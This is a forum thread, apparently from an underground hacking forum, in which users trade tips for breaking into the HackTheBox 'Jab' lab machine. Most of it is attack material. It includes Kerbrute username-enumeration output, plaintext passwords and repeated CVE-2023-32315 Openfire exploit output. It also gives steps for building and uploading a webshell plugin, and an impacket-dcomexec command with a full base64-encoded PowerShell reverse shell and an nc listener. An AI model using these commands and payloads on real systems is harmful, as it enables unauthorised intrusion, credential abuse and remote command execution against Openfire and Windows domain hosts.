Posts: 156
Threads: 4
Joined: Jan 2024
Feb 25, 2024, 05:14 PM
(This post was last modified: Feb 25, 2024, 05:17 PM by ineedtopee.)
(Feb 25, 2024, 03:13 PM)fuliye Wrote: (Feb 24, 2024, 07:12 PM)DataNinja Wrote: 2024/02/24 13:07:35 > [+] VALID USERNAME: drew@jab.htb
2024/02/24 13:07:54 > [+] VALID USERNAME: jsmith@jab.htb
2024/02/24 13:08:04 > [+] VALID USERNAME: administrator@jab.htb
2024/02/24 13:08:08 > [+] VALID USERNAME: thanks@jab.htb
2024/02/24 13:08:18 > [+] VALID USERNAME: dsmith@jab.htb
2024/02/24 13:08:24 > [+] VALID USERNAME: jjones@jab.htb
2024/02/24 13:08:25 > [+] VALID USERNAME: dbrown@jab.htb
2024/02/24 13:08:34 > [+] VALID USERNAME: jscott@jab.htb
2024/02/24 13:08:48 > [+] VALID USERNAME: mbrown@jab.htb
2024/02/24 13:08:51 > [+] VALID USERNAME: jmartin@jab.htb
2024/02/24 13:08:52 > [+] VALID USERNAME: ssmith@jab.htb
2024/02/24 13:08:55 > [+] VALID USERNAME: rsmith@jab.htb
2024/02/24 13:08:55 > [+] VALID USERNAME: msmith@jab.htb
2024/02/24 13:09:03 > [+] VALID USERNAME: jmiller@jab.htb
2024/02/24 13:09:07 > [+] VALID USERNAME: bsmith@jab.htb
2024/02/24 13:09:09 > [+] VALID USERNAME: jwalker@jab.htb
2024/02/24 13:09:09 > [+] VALID USERNAME: jjohnson@jab.htb
2024/02/24 13:09:09 > [+] VALID USERNAME: jbrown@jab.htb
2024/02/24 13:09:16 > [+] VALID USERNAME: csmith@jab.htb
2024/02/24 13:09:18 > [+] VALID USERNAME: mjones@jab.htb
2024/02/24 13:09:21 > [+] VALID USERNAME: tbrown@jab.htb
2024/02/24 13:09:33 > [+] VALID USERNAME: jclark@jab.htb
2024/02/24 13:09:44 > [+] VALID USERNAME: gsmith@jab.htb
2024/02/24 13:09:45 > [+] VALID USERNAME: djones@jab.htb
2024/02/24 13:09:45 > [+] VALID USERNAME: chill@jab.htb
2024/02/24 13:09:45 > [+] VALID USERNAME: cdavis@jab.htb
2024/02/24 13:09:46 > [+] VALID USERNAME: bjones@jab.htb
2024/02/24 13:09:50 > [+] VALID USERNAME: kbrown@jab.htb
2024/02/24 13:09:51 > [+] VALID USERNAME: creed@jab.htb
2024/02/24 13:09:53 > [+] VALID USERNAME: Drew@jab.htb
2024/02/24 13:09:56 > [+] VALID USERNAME: ksmith@jab.htb
2024/02/24 13:09:56 > [+] VALID USERNAME: jdavis@jab.htb
2024/02/24 13:10:03 > [+] VALID USERNAME: asmith@jab.htb
2024/02/24 13:10:05 > [+] VALID USERNAME: sbrown@jab.htb
2024/02/24 13:10:07 > [+] VALID USERNAME: mdavis@jab.htb
2024/02/24 13:10:10 > [+] VALID USERNAME: callen@jab.htb
2024/02/24 13:10:13 > [+] VALID USERNAME: rmiller@jab.htb
2024/02/24 13:10:13 > [+] VALID USERNAME: rbrown@jab.htb
2024/02/24 13:10:15 > [+] VALID USERNAME: jwilliams@jab.htb
2024/02/24 13:10:18 > [+] VALID USERNAME: bwhite@jab.htb
2024/02/24 13:10:19 > [+] VALID USERNAME: bbrown@jab.htb
2024/02/24 13:10:24 > [+] VALID USERNAME: jtaylor@jab.htb
2024/02/24 13:10:26 > [+] VALID USERNAME: cjones@jab.htb
2024/02/24 13:10:26 > [+] VALID USERNAME: bmiller@jab.htb
2024/02/24 13:10:30 > [+] VALID USERNAME: sjones@jab.htb
2024/02/24 13:10:33 > [+] VALID USERNAME: jthomas@jab.htb
2024/02/24 13:10:47 > [+] VALID USERNAME: bjohnson@jab.htb
2024/02/24 13:10:52 > [+] VALID USERNAME: rjones@jab.htb
2024/02/24 13:10:54 > [+] VALID USERNAME: mjohnson@jab.htb
2024/02/24 13:10:54 > [+] VALID USERNAME: mharris@jab.htb
2024/02/24 13:10:55 > [+] VALID USERNAME: jgreen@jab.htb
2024/02/24 13:10:58 > [+] VALID USERNAME: cjohnson@jab.htb
2024/02/24 13:11:01 > [+] VALID USERNAME: teller@jab.htb
2024/02/24 13:11:03 > [+] VALID USERNAME: mthomas@jab.htb
2024/02/24 13:11:06 > [+] VALID USERNAME: dwilson@jab.htb
2024/02/24 13:11:07 > [+] VALID USERNAME: dmartin@jab.htb
2024/02/24 13:11:16 > [+] VALID USERNAME: jprice@jab.htb
2024/02/24 13:11:16 > [+] VALID USERNAME: jmurphy@jab.htb
2024/02/24 13:11:16 > [+] VALID USERNAME: jbaker@jab.htb
2024/02/24 13:11:16 > [+] VALID USERNAME: jallen@jab.htb
2024/02/24 13:11:18 > [+] VALID USERNAME: dtaylor@jab.htb
2024/02/24 13:11:18 > [+] VALID USERNAME: dlewis@jab.htb
2024/02/24 13:11:19 > [+] VALID USERNAME: cmiller@jab.htb
2024/02/24 13:11:24 > [+] VALID USERNAME: sjohnson@jab.htb
2024/02/24 13:11:29 > [+] VALID USERNAME: dwells@jab.htb
2024/02/24 13:11:29 > [+] VALID USERNAME: djohnson@jab.htb
2024/02/24 13:11:30 > [+] VALID USERNAME: ddavis@jab.htb
2024/02/24 13:11:31 > [+] VALID USERNAME: charris@jab.htb
2024/02/24 13:11:31 > [+] VALID USERNAME: breed@jab.htb
2024/02/24 13:11:32 > [+] VALID USERNAME: ajones@jab.htb
2024/02/24 13:11:39 > [+] VALID USERNAME: tthomas@jab.htb
2024/02/24 13:11:41 > [+] VALID USERNAME: scooper@jab.htb
2024/02/24 13:11:45 > [+] VALID USERNAME: kjones@jab.htb
2024/02/24 13:11:45 > [+] VALID USERNAME: jwright@jab.htb
2024/02/24 13:11:46 > [+] VALID USERNAME: jmoore@jab.htb
2024/02/24 13:11:48 > [+] VALID USERNAME: dmoore@jab.htb
2024/02/24 13:11:49 > [+] VALID USERNAME: dbaker@jab.htb
2024/02/24 13:11:51 > [+] VALID USERNAME: bdavis@jab.htb
2024/02/24 13:11:58 > [+] VALID USERNAME: sanderson@jab.htb
2024/02/24 13:11:59 > [+] VALID USERNAME: psmith@jab.htb
2024/02/24 13:12:00 > [+] VALID USERNAME: pbrown@jab.htb
2024/02/24 13:12:03 > [+] VALID USERNAME: jwilson@jab.htb
2024/02/24 13:12:03 > [+] VALID USERNAME: jturner@jab.htb
2024/02/24 13:12:03 > [+] VALID USERNAME: jroberts@jab.htb
2024/02/24 13:12:03 > [+] VALID USERNAME: jharris@jab.htb
2024/02/24 13:12:03 > [+] VALID USERNAME: jcarter@jab.htb
2024/02/24 13:12:04 > [+] VALID USERNAME: hsmith@jab.htb
2024/02/24 13:12:05 > [+] VALID USERNAME: fried@jab.htb
2024/02/24 13:12:06 > [+] VALID USERNAME: dnelson@jab.htb
2024/02/24 13:12:07 > [+] VALID USERNAME: cwhite@jab.htb
2024/02/24 13:12:07 > [+] VALID USERNAME: cmorris@jab.htb
2024/02/24 13:12:14 > [+] VALID USERNAME: tmiller@jab.htb
2024/02/24 13:12:14 > [+] VALID USERNAME: tjohnson@jab.htb
2024/02/24 13:12:15 > [+] VALID USERNAME: tdavis@jab.htb
2024/02/24 13:12:15 > [+] VALID USERNAME: ajohnson@jab.htb
2024/02/24 13:12:16 > [+] VALID USERNAME: sclark@jab.htb
2024/02/24 13:12:17 > [+] VALID USERNAME: rdavis@jab.htb
2024/02/24 13:12:19 > [+] VALID USERNAME: mwilson@jab.htb
2024/02/24 13:12:19 > [+] VALID USERNAME: myoung@jab.htb
2024/02/24 13:12:19 > [+] VALID USERNAME: mtaylor@jab.htb
2024/02/24 13:12:19 > [+] VALID USERNAME: mmartin@jab.htb
2024/02/24 13:12:20 > [+] VALID USERNAME: mallen@jab.htb
2024/02/24 13:12:20 > [+] VALID USERNAME: lsmith@jab.htb
2024/02/24 13:12:29 > [+] VALID USERNAME: bmartin@jab.htb
2024/02/24 13:12:36 > [+] VALID USERNAME: Administrator@jab.htb
2024/02/24 13:12:39 > [+] VALID USERNAME: sjames@jab.htb
2024/02/24 13:12:41 > [+] VALID USERNAME: rjohnson@jab.htb
2024/02/24 13:12:42 > [+] VALID USERNAME: radams@jab.htb
2024/02/24 13:12:44 > [+] VALID USERNAME: mjames@jab.htb
2024/02/24 13:12:45 > [+] VALID USERNAME: mgreen@jab.htb
2024/02/24 13:12:47 > [+] VALID USERNAME: jmorgan@jab.htb
2024/02/24 13:12:47 > [+] VALID USERNAME: jgarcia@jab.htb
2024/02/24 13:12:52 > [+] VALID USERNAME: flanders@jab.htb
bro how to brute those users?? when i bruting ,that callback KDC error
Run Kerbrute: kerbrute userenum --dc <DOMAIN_CONTROLLER_IP> -d <DOMAIN_NAME> <USER_LIST_FILE>
Replace <DOMAIN_CONTROLLER_IP> with the IP address of the domain controller, <DOMAIN_NAME> with the target domain name, and <USER_LIST_FILE> with the path to the file containing the list of usernames (XATO_10_million in my case).
(Feb 25, 2024, 01:19 PM)query1338 Wrote: Can someone tell me how to login with pidgin?
I am giving pigin as user test and as domain jab.htb
but my pidgin tells me that I am not able to login, I tought that I can login anonymously?
I too am faced with a similar issue, created user on domain but it i cant seem to connect/login , can someone please help me with this , any help is much appreciated.
Thanks
Posts: 6
Threads: 0
Joined: Feb 2024
Feb 25, 2024, 06:45 PM
(This post was last modified: Feb 25, 2024, 06:46 PM by sus11.)
https://hotimg.com/hdD2V
used evil winrm but doesnt work
evil-winrm -i 10.10.11.4 -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@'
Posts: 6
Threads: 0
Joined: Feb 2024
(Feb 25, 2024, 02:14 PM)wfuuuuuufaz Wrote: to anyone having trouble with impacket-dcomexec, i managed to use this using the IP of the target machine instead of the dns entry in /etc/hosts
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@Jab.htb 'cmd.exe /c powershell -e [revshell_in_base64]' -silentcommand
This doesn't work ^
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.x.x 'cmd.exe /c powershell -e [revshell_in_base64]' -silentcommand
This works gracefully
That doesn't work for me, maybe you can share the payload in base64 you used ? I don't get why it doesnt work tho...
Posts: 6
Threads: 0
Joined: Jan 2024
Hi, can anyone help me with login to OpenFire Console? I try 3 exploits of CVE-2023-32315 bypass and manual way, but no luck. Login is not working... 
I tried a login -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@' creds no luck.
I don't know there I have a mistake. New login user looks genrated correctly>
┌──(root㉿kali)-[/home/…/Jab/CVE-2023-32315/CVE-2023-32315-Openfire-Bypass/scan_all]
└─# /snap/bin/go run main.go -u http://127.0.0.1:9090
成功获取目标http://127.0.0.1:9090 JSESSIONID: node05fhguao7ux1f230lglps26it12.node0 +csrf: qHY7oJepIsjL1UG
用户增加成功:url:http://127.0.0.1:9090 username:3br8qs password:f0bqso
┌──(root㉿kali)-[/home/kali/HTB/Jab/CVE-2023-32315]
└─# python CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node0ojd3c3umuzcbs01w4swcmvxk10.node0 + csrf: uvClflib6cPd853
User added successfully: url: http://127.0.0.1:9090 username: hyft37 password: 0e18dn
██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════
╔════════════╩═════════════════════════════════╩═════════════════════════════╗
║ • AUTHOR | PARI MALAM ║
║ • GITHUB | GITHUB.COM/PARI-MALAM ║
╔════════════════════════════════════════════════════════════════════════════╝
║ • OFFICIAL FORUM | DRAGONFORCE.IO ║
║ • OFFICIAL TELEGRAM | TELEGRAM.ME/DRAGONFORCEIO ║
╚════════════════════════════════════════════════════════════════════════════╝
[CVE-2023–32315] - Openfire Console Authentication Bypass Vulnerability
[CVE-2023–32315] - http://127.0.0.1:9090 - Checking in current... Please be patient!
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] JSESSIONID: node0plgkr5c36gak49837oldb23p4.node0 CSRF: 6jP6N9YBxyyrII2
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] Successful with no problemo!
[+] URLs: http://127.0.0.1:9090
Username: rxjxaa
Password: mfn3yq
Thx for any ideas!!
Posts: 31
Threads: 0
Joined: Oct 2023
(Feb 25, 2024, 07:34 PM)kokot0kokot0 Wrote: Hi, can anyone help me with login to OpenFire Console? I try 3 exploits of CVE-2023-32315 bypass and manual way, but no luck. Login is not working...
I tried a login -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@' creds no luck.
I don't know there I have a mistake. New login user looks genrated correctly>
┌──(root㉿kali)-[/home/…/Jab/CVE-2023-32315/CVE-2023-32315-Openfire-Bypass/scan_all]
└─# /snap/bin/go run main.go -u http://127.0.0.1:9090
成功获取目标http://127.0.0.1:9090 JSESSIONID: node05fhguao7ux1f230lglps26it12.node0 +csrf: qHY7oJepIsjL1UG
用户增加成功:url:http://127.0.0.1:9090 username:3br8qs password:f0bqso
┌──(root㉿kali)-[/home/kali/HTB/Jab/CVE-2023-32315]
└─# python CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node0ojd3c3umuzcbs01w4swcmvxk10.node0 + csrf: uvClflib6cPd853
User added successfully: url: http://127.0.0.1:9090 username: hyft37 password: 0e18dn
██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════
╔════════════╩═════════════════════════════════╩═════════════════════════════╗
║ • AUTHOR | PARI MALAM ║
║ • GITHUB | GITHUB.COM/PARI-MALAM ║
╔════════════════════════════════════════════════════════════════════════════╝
║ • OFFICIAL FORUM | DRAGONFORCE.IO ║
║ • OFFICIAL TELEGRAM | TELEGRAM.ME/DRAGONFORCEIO ║
╚════════════════════════════════════════════════════════════════════════════╝
[CVE-2023–32315] - Openfire Console Authentication Bypass Vulnerability
[CVE-2023–32315] - http://127.0.0.1:9090 - Checking in current... Please be patient!
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] JSESSIONID: node0plgkr5c36gak49837oldb23p4.node0 CSRF: 6jP6N9YBxyyrII2
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] Successful with no problemo!
[+] URLs: http://127.0.0.1:9090
Username: rxjxaa
Password: mfn3yq
Thx for any ideas!!
you got the user and password.
bit my question is, where do I get a malicious plugin to upload? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 8
Threads: 0
Joined: Feb 2024
(Feb 25, 2024, 07:34 PM)kokot0kokot0 Wrote: Hi, can anyone help me with login to OpenFire Console? I try 3 exploits of CVE-2023-32315 bypass and manual way, but no luck. Login is not working...
I tried a login -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@' creds no luck.
I don't know there I have a mistake. New login user looks genrated correctly>
┌──(root㉿kali)-[/home/…/Jab/CVE-2023-32315/CVE-2023-32315-Openfire-Bypass/scan_all]
└─# /snap/bin/go run main.go -u http://127.0.0.1:9090
成功获取目标http://127.0.0.1:9090 JSESSIONID: node05fhguao7ux1f230lglps26it12.node0 +csrf: qHY7oJepIsjL1UG
用户增加成功:url:http://127.0.0.1:9090 username:3br8qs password:f0bqso
┌──(root㉿kali)-[/home/kali/HTB/Jab/CVE-2023-32315]
└─# python CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node0ojd3c3umuzcbs01w4swcmvxk10.node0 + csrf: uvClflib6cPd853
User added successfully: url: http://127.0.0.1:9090 username: hyft37 password: 0e18dn
██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════
╔════════════╩═════════════════════════════════╩═════════════════════════════╗
║ • AUTHOR | PARI MALAM ║
║ • GITHUB | GITHUB.COM/PARI-MALAM ║
╔════════════════════════════════════════════════════════════════════════════╝
║ • OFFICIAL FORUM | DRAGONFORCE.IO ║
║ • OFFICIAL TELEGRAM | TELEGRAM.ME/DRAGONFORCEIO ║
╚════════════════════════════════════════════════════════════════════════════╝
[CVE-2023–32315] - Openfire Console Authentication Bypass Vulnerability
[CVE-2023–32315] - http://127.0.0.1:9090 - Checking in current... Please be patient!
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] JSESSIONID: node0plgkr5c36gak49837oldb23p4.node0 CSRF: 6jP6N9YBxyyrII2
[CVE-2023–32315] - http://127.0.0.1:9090 - [w00t!] Successful with no problemo!
[+] URLs: http://127.0.0.1:9090
Username: rxjxaa
Password: mfn3yq
Thx for any ideas!!
You should be able to login with the svc_openfire creds and then upload the .jar that comes with that exploit, upload it, and then access the plugin and run system commands.
Posts: 6
Threads: 0
Joined: Jan 2024
[/quote]
you got the user and password.
bit my question is, where do I get a malicious plugin to upload?
[/quote]
Right, I'm dick  , just change to admin. PWNed!
Upload shell is easy follow >> Plugis Upload plugin, work OK >> https://vulncheck.com/blog/openfire-cve-2023-32315
git clone https://github.com/igniterealtime/openfire-exampleplugin.git
cd openfire-exampleplugin
cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp
mvn -B package
cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
Upload and Find way to plugin (Server - Server Settings - Example Plugin Properties), Burp it and this will be like >
Request >>
GET /plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=node012txtplaerr6rwvlebux0iggh19.node0; csrf=q1ykIQUNq7jVDk5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Response >>
HTTP/1.1 200 OK
Connection: close
Date: Sun, 25 Feb 2024 20:21:27 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
X-Error: nt authority\system <<< Look here :-)
Content-Length: 6741
Rev shell, sometimes is plugin removed just upload again ... hope it help
Posts: 5
Threads: 0
Joined: Feb 2024
Feb 25, 2024, 08:47 PM
(This post was last modified: Feb 25, 2024, 08:49 PM by wfuuuuuufaz.)
(Feb 25, 2024, 06:59 PM)fmkss Wrote: (Feb 25, 2024, 02:14 PM)wfuuuuuufaz Wrote: to anyone having trouble with impacket-dcomexec, i managed to use this using the IP of the target machine instead of the dns entry in /etc/hosts
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@Jab.htb 'cmd.exe /c powershell -e [revshell_in_base64]' -silentcommand
This doesn't work ^
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.x.x 'cmd.exe /c powershell -e [revshell_in_base64]' -silentcommand
This works gracefully
That doesn't work for me, maybe you can share the payload in base64 you used ? I don't get why it doesnt work tho...
you can just go to https://www.revshells.com/, put your VPN IP, port and copy the payload of Powershell #3 (Base64)
result would be something like this:
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.14.4 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' -silentcommand
and, of course, you need to be listening with nc in the port you defined
nc -nvlp [port]
Posts: 8
Threads: 0
Joined: Feb 2024
Feb 25, 2024, 09:20 PM
(This post was last modified: Feb 25, 2024, 09:24 PM by sh3b4ng5.)
(Feb 25, 2024, 07:47 PM)query1338 Wrote: (Feb 25, 2024, 07:34 PM)kokot0kokot0 Wrote: Hi, can anyone help me with login to OpenFire Console? I try 3 exploits of CVE-2023-32315 bypass and manual way, but no luck. Login is not working...
I tried a login -u administrator -p 'odW!!mVfbXs304kskt!QAZDVGY&@' creds no luck.
I don't know there I have a mistake. New login user looks genrated correctly>
┌──(root㉿kali)-[/home/…/Jab/CVE-2023-32315/CVE-2023-32315-Openfire-Bypass/scan_all]
└─# /snap/bin/go run main.go -u http://127.0.0.1:9090
成功获取目标http://127.0.0.1:9090 JSESSIONID: node05fhguao7ux1f230lglps26it12.node0 +csrf: qHY7oJepIsjL1UG
用户增加成功:url:http://127.0.0.1:9090 username:3br8qs password:f0bqso
Here's where I got it:
https://github.com/miko550/CVE-2023-32315/tree/main
